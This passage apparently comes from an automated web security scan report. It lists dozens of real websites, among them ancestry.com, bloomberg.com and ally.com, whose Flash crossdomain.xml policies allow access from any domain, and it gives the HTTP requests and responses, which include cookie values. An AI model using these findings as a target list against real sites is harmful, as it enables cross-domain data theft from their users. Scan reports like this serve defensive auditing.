Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.about.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:24 GMT
Server: Apache
Vary: *
PRAGMA: no-cache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 13:37:24 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.specials.about.com" />
...[SNIP]...

7.7. http://www.accesshollywood.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accesshollywood.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.accesshollywood.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Content-Type: application/xml
Content-Length: 232
X-Aicache-OS: 64.210.193.113:80
Expires: Sat, 02 Apr 2011 13:45:42 GMT
Date: Sat, 02 Apr 2011 13:45:42 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sun, 03-Apr-2011 13:45:42 GMT; path=/
Vary: User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" heade
...[SNIP]...

7.8. http://www.accuweather.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.accuweather.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=7200
Content-Length: 1403
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 20:00:39 GMT
Accept-Ranges: bytes
ETag: "c28f298dc2a9ca1:322cf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:43:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.accuweather.com" />
<allow-access-from domain="*.accuweatherchannel.com" />
<allow-access-from domain="*.discovery.com" />
<allow-access-from domain="*.oddcast.com" />
<allow-access-from domain="*.ucview.com" />
<allow-access-from domain="*.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.adcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dartmotif.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="maps.google.com" />
<allow-access-from domain="maps.yahooapis.com"/>
<allow-access-from domain="spm161.brinkster.net" />
<allow-access-from domain="www.dotglu.com" />
<allow-access-from domain="www.johnfrieda.com" />
<allow-access-from domain="www.travelboards.com" />
<allow-access-from domain="www.topix.com"/>
<allow-access-from domain="66.42.146.50" />
<allow-access-from domain="66.42.146.66" />
<allow-access-from domain="68.167.121.226" />
...[SNIP]...

7.9. http://www.addictinggames.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addictinggames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.addictinggames.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 Resin/3.1.9 PHP/5.3.1
Last-Modified: Fri, 11 Feb 2011 23:55:49 GMT
Accept-Ranges: bytes
Content-Length: 421
Cache-Control: public, max-age=86400
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:35:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <!-- meta policy -->
   <site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.10. http://www.adriver.ru/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adriver.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adriver.ru

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:32 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 08:34:06 GMT
ETag: "458c0d-ef-4928f92b29b80"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*" to-ports="80"/>
   <allow-http-request-headers-from domain="
...[SNIP]...

7.11. http://www.ajc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ajc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ajc.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 100
Content-Type: text/xml
Cache-Control: max-age=1
Date: Sat, 02 Apr 2011 13:40:39 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.12. http://www.allvoices.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allvoices.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 17:01:16 GMT
ETag: "578d4b-65-49fca3dce8f00"
Accept-Ranges: bytes
Content-Length: 101
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.13. http://www.ally.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ally.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ally.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=8
X-UA-Compatible: IE=8
Date: Sat, 02 Apr 2011 13:43:18 GMT
Content-Length: 279
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.14. http://www.ancestry.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ancestry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ancestry.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: VARSESSION=S=2To6XE41OEWVVJSHFtyXpg%3d%3d&SLI=0&FIRSTSESSION=1&ITT=0; domain=.ancestry.com; path=/
Set-Cookie: ANCUUID=jSELjk5wn-UrtNkDbm1ZoC; domain=.ancestry.com; expires=Wed, 02-Apr-2031 13:23:58 GMT; path=/
Set-Cookie: ATT=0; domain=.ancestry.com; path=/
Set-Cookie: ANCATT=0; domain=.ancestry.com; path=/
Set-Cookie: SAC=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/
Set-Cookie: RMEATT=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/
Set-Cookie: VARS=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/
X-AspNet-Version: 4.0.30319
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI NAV INT PRE"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:23:57 GMT
Connection: close
Content-Length: 227

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.15. http://www.answerstv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.answerstv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.answerstv.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 13 Oct 2008 07:24:02 GMT
Accept-Ranges: bytes
ETag: "0d579aa42dc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:06 GMT
Connection: close
Content-Length: 355

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.16. http://www.apartmenthomeliving.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.apartmenthomeliving.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apartmenthomeliving.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:34 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 13:52:12 GMT
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.17. http://www.apartments.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.apartments.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apartments.com

Response

HTTP/1.1 200 OK
Content-Length: 320
Content-Type: text/xml
Last-Modified: Thu, 29 May 2008 18:49:26 GMT
Accept-Ranges: bytes
ETag: "7d3deb7bcc1c81:0"
Server: Microsoft-IIS/7.5
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:18 AM&lastactivitytime=4/2/2011 8:45:18 AM&visitid=0492ebbb-7f02-49b1-a38b-6abeb3a067f1&visitorid=71dabbfe-f70f-42a7-a087-3839130837e5&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:18 GMT; path=/
Set-Cookie: AptAff=bcebc5f18797507fbea1f95dd9c16e6f175b4a5d707036d32d014473ac89b5b1;Path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:18 AM&lastactivitytime=4/2/2011 8:45:18 AM&visitid=0492ebbb-7f02-49b1-a38b-6abeb3a067f1&visitorid=71dabbfe-f70f-42a7-a087-3839130837e5&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:18 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:18 GMT
Connection: close
Set-Cookie: aptspersistence=578884780.24576.0000; path=/

<?xml version="1.0"?>
<!-- http://gdata.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
...[SNIP]...

7.18. http://www.archive.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.archive.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.archive.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.32
Date: Sat, 02 Apr 2011 13:36:06 GMT
Content-Type: text/xml
Content-Length: 78
Last-Modified: Tue, 08 Mar 2011 00:34:01 GMT
Connection: close
Expires: Sat, 02 Apr 2011 19:36:06 GMT
Cache-Control: max-age=21600
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>


7.19. http://www.askmen.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.askmen.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Last-Modified: Fri, 01 May 2009 14:10:22 GMT
ETag: "4d6cce-d3-468da5f967d54"-gzip
ServerHost: (null)
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:26:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:26:34 GMT
Content-Length: 211
Connection: close
Set-Cookie: NSC_btlnfo_iuuq_wjq=ffffffff090f1b3545525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

7.20. http://www.atom.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.atom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atom.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"138-1300820240000"
Last-Modified: Tue, 22 Mar 2011 18:57:20 GMT
Content-Type: text/xml
Content-Length: 138
INFO_HOST: www.atom.com
Cache-Control: max-age=837
Expires: Sat, 02 Apr 2011 14:11:37 GMT
Date: Sat, 02 Apr 2011 13:57:40 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:57:40 GMT; path=/
Vary: User-Agent

<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.21. http://www.babelgum.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.babelgum.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babelgum.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
ETag: "f6804c-d0-490c48be6ef80"
Server: Apache/2.2.16
Age: 228561
Date: Sat, 02 Apr 2011 13:41:19 GMT
Last-Modified: Tue, 21 Sep 2010 12:55:42 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.22. http://www.biblegateway.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.biblegateway.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:34:50 GMT
Content-Type: text/xml; charset=utf-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Thu, 31 Mar 2011 20:34:45 GMT
ETag: "9d7bf-cd-39486340"
Accept-Ranges: bytes
Content-Length: 205

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.23. http://www.bigpoint.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigpoint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bigpoint.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:54:03 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2010 10:20:15 GMT
ETag: "12cc6f-67-493fb277695c0"
Accept-Ranges: bytes
Content-Length: 103
Vary: Accept-Encoding,User-Agent
Content-Type: application/xml
X-XTM-Node: pool-03-www-017033
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.24. http://www.bizjournals.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizjournals.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bizjournals.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 17:11:42 GMT
ETag: "cc-48d671c40cf80"
Accept-Ranges: bytes
Content-Length: 204
ServerID: 8
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.25. http://www.blackberry.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blackberry.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:46 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 21:59:07 GMT
ETag: "11eadd1-c7-496d91d17a0c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.26. http://www.blogs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogs.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 14:07:11 GMT
Server: Apache
Last-Modified: Wed, 16 Feb 2011 20:12:27 GMT
ETag: "b94708-eb-49c6be65b00c0"
Accept-Ranges: bytes
Content-Length: 235
Vary: Accept-Encoding
Content-Type: text/xml
Content-Language: en

<?xml version="1.0"?>
       

    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       

    <cross-domain-policy>
       

    <allow-access-from domain="*" />
...[SNIP]...

7.27. http://www.bloomberg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bloomberg.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Expires: Sun, 01 Apr 2012 13:23:23 GMT
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Wed, 07 Jul 2010 19:36:53 GMT
ETag: W/"ff-4c34d755"
Date: Sat, 02 Apr 2011 13:23:23 GMT
Content-Length: 255
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-header
...[SNIP]...

7.28. http://www.boostmobile.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boostmobile.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.boostmobile.com

Response

HTTP/1.1 200 OK
Content-Length: 220
Content-Type: text/xml
Last-Modified: Fri, 29 May 2009 18:38:10 GMT
Accept-Ranges: bytes
ETag: "e9bbdb9d8ce0c91:13e3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: https://apps.boostmobile.com
Date: Sat, 02 Apr 2011 13:37:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cr
...[SNIP]...

7.29. http://www.bravotv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bravotv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bravotv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Varnish: 424538094
Content-Type: text/xml
Varnish-X-Cache: MISS
ETag: "1f70023-13e-48d3cc9cc3480"
Last-Modified: Sat, 07 Aug 2010 14:42:10 GMT
Content-Length: 318
Cache-Control: max-age=281
Date: Sat, 02 Apr 2011 13:40:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.30. http://www.break.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.break.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.break.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 16 Jun 2006 02:53:41 GMT
ETag: "3ed36e13f090c61:b41f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 157
Date: Sat, 02 Apr 2011 12:38:46 GMT
X-Varnish: 396558551 396540669
Age: 124
Via: 1.1 varnish
Connection: close
X-Varnish-Host: varnish03
X-Client-IP: 173.193.214.243
X-Country: US

<?xml version="1.0"?>
<!-- http://content.break.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.31. http://www.buzznet.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzznet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.buzznet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:25 GMT
Server: Apache
Set-Cookie: bncom=173.193.214.243.68811301751865710; path=/; domain=.buzznet.com
Last-Modified: Sat, 01 May 2010 08:01:30 GMT
ETag: "ca-4bdbdfda"
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.32. http://www.cafemom.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cafemom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cafemom.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:28 GMT
Server: Apache
Last-Modified: Thu, 21 Jan 2010 22:10:57 GMT
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.33. http://www.cbs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbs.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 13 Aug 2010 17:04:44 GMT
X-Real-Server: ws3182.drt.cbsig.net
Content-Type: application/xml
Cache-Control: max-age=248
Date: Sat, 02 Apr 2011 13:27:26 GMT
Content-Length: 1941
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
